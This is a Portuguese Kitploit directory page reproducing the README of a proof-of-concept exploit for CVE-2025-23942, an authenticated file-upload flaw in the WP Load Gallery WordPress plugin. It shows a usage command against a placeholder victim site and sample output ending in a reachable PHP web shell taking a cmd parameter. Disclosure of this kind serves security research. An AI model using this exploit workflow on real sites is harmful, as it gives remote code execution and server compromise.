Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2025-23942-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - Autenticado (Autor+) Upload Arbitrário de Arquivo

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit do WP Load Gallery (CVE-2025-23942)

📌 Descrição

Vulnerabilidade de Upload Irrestrito de Arquivo com Tipo Perigoso no WP Load Gallery da NgocCode permite o upload de um Web Shell para um servidor web. Este problema afeta o WP Load Gallery: de n/a até 2.1.6.

⚠️ Detalhes da Vulnerabilidade

  • CVE ID: CVE-2025-23942
  • Plugin Afetado: WP Load Gallery
  • Versões Afetadas: Até 2.1.6
  • Tipo de Vulnerabilidade: Upload Irrestrito de Arquivo
  • Severidade: Crítica (9.1 CVSS)
  • Vetor de Ataque: Execução Remota de Código (RCE) Autenticada (Autor+)
  • Patch Disponível: ❌ (Nenhum patch oficial ainda)

🚀 Recursos do Exploit

✅ Exploração Automatizada – Extrai o nonce, faz login e envia a shell automaticamente.
✅ Verificação de Versão – Confirma se o alvo está vulnerável antes da exploração.
✅ Tratamento de Erros – Garante execução suave mesmo em caso de falhas.
✅ Gerenciamento de Sessão – Usa gerenciamento de sessão persistente para autenticação.
✅ Feedback em Tempo Real – Fornece saída a cada etapa.

🛠️ Requisitos

  • Python 3.x
  • Módulo requests (pip install requests)
  • Uma conta Autor+ do WordPress válida no sistema alvo

🔥 Uso

Execute o script com os parâmetros necessários:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

Exemplo:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 Exemplo de Saída

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 Aviso Legal

Este exploit é destinado apenas para fins educacionais e de pesquisa em segurança. Não o utilize em sistemas que você não possui ou para os quais não tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido deste script. ( Khaled_alenazi )

Baixar ferramenta